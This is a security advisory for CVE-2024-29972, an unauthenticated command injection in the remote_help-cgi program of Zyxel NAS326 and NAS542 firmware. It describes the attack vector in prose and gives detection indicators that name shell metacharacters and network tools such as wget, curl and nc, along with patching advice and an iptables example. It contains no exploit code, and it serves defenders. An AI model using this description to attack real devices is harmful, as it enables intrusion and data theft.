CVE-2024-29972: Zyxel NAS326 Firmware RCE Vulnerability

CVE-2024-29972 Overview

CVE-2024-29972 is a critical command injection vulnerability affecting Zyxel NAS devices. The vulnerability exists in the CGI program remote_help-cgi and allows an unauthenticated attacker to execute arbitrary operating system commands by sending a specially crafted HTTP POST request. This vulnerability is particularly concerning as the affected products were marked as unsupported at the time of disclosure, meaning some devices may never receive official patches.

Critical Impact

Unauthenticated remote attackers can achieve full system compromise on affected Zyxel NAS devices, potentially leading to data theft, ransomware deployment, or use of the compromised device as a pivot point for further network attacks.

Affected Products

• Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0
• Zyxel NAS542 firmware versions before V5.21(ABAG.14)C0
• Zyxel NAS326 and NAS542 hardware devices running vulnerable firmware

Discovery Timeline

• 2024-06-04 - CVE-2024-29972 published to NVD
• 2025-01-22 - Last updated in NVD database

Technical Details for CVE-2024-29972

Vulnerability Analysis

This command injection vulnerability (CWE-78) resides in the remote_help-cgi CGI program used by Zyxel NAS devices for remote assistance functionality. The vulnerability allows attackers to inject arbitrary operating system commands through the web interface without requiring any authentication. Due to the network-accessible nature of the web interface and the lack of authentication requirements, exploitation is straightforward for attackers who can reach the device over the network.

The EPSS (Exploit Prediction Scoring System) indicates a probability of 92.68% with a percentile of 99.75, placing this vulnerability among the most likely to be exploited. A public proof-of-concept is available, significantly increasing the risk of active exploitation in the wild.

Root Cause

The root cause of CVE-2024-29972 is insufficient input validation and sanitization in the remote_help-cgi CGI program. User-supplied input from HTTP POST requests is passed directly to system shell commands without proper escaping or validation, enabling command injection. This is a classic example of CWE-78 (Improper Neutralization of Special Elements used in an OS Command).

Attack Vector

The attack vector for this vulnerability is network-based. An attacker can exploit CVE-2024-29972 by sending a maliciously crafted HTTP POST request to the remote_help-cgi endpoint on the target NAS device. The vulnerability requires no authentication, no user interaction, and has low attack complexity.

The attacker injects shell metacharacters and commands into parameters processed by the CGI script. When the vulnerable code processes this input, the injected commands are executed with the privileges of the web server process, typically running as root on embedded NAS devices. This can lead to complete system compromise, including access to all stored data, credential theft, and potential lateral movement within the network.

For detailed technical analysis and proof-of-concept information, refer to the Outpost24 Blog on Zyxel Vulnerabilities and the public PoC repository.

Detection Methods for CVE-2024-29972

Indicators of Compromise

• Unusual HTTP POST requests to /cgi-bin/remote_help-cgi or similar CGI endpoints containing shell metacharacters (;, |, $(), backticks)
• Unexpected outbound network connections from NAS devices to unknown external hosts
• New or modified files in system directories, particularly web shells or persistence mechanisms
• Anomalous process spawning from the web server process (e.g., sh, wget, curl, nc)

Detection Strategies

• Monitor web server access logs for requests targeting remote_help-cgi with suspicious parameter values
• Implement network-based intrusion detection rules to identify command injection patterns in HTTP traffic to NAS devices
• Deploy file integrity monitoring on NAS devices to detect unauthorized modifications
• Utilize behavioral analysis to identify unusual process execution chains originating from web server processes

Monitoring Recommendations

• Enable verbose logging on Zyxel NAS devices and forward logs to a centralized SIEM for analysis
• Set up alerts for any access attempts to known vulnerable CGI endpoints
• Monitor for DNS queries to unusual domains or IP addresses from NAS device segments
• Implement network segmentation to limit NAS device exposure and enable easier traffic monitoring

How to Mitigate CVE-2024-29972

Immediate Actions Required

• Update Zyxel NAS326 firmware to version V5.21(AAZF.17)C0 or later
• Update Zyxel NAS542 firmware to version V5.21(ABAG.14)C0 or later
• If patching is not possible, immediately isolate affected NAS devices from untrusted networks
• Review NAS device logs for signs of prior exploitation

Patch Information

Zyxel has released firmware updates to address this vulnerability. However, it is important to note that these products were marked as "unsupported" at the time of CVE assignment, meaning future support may be limited. Organizations should review the Zyxel Security Advisory for NAS Products for complete patch details and download links.

Given the end-of-support status, organizations should consider migrating to supported NAS solutions that will receive ongoing security updates.

Workarounds

• Restrict network access to the NAS web interface using firewall rules, allowing only trusted IP addresses
• Disable remote management and remote help features if not required for operations
• Place NAS devices on isolated network segments without direct internet exposure
• Implement a reverse proxy with web application firewall (WAF) capabilities to filter malicious requests

# Example: Restrict access to NAS web interface using iptables
# Allow only trusted management subnet
iptables -A INPUT -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP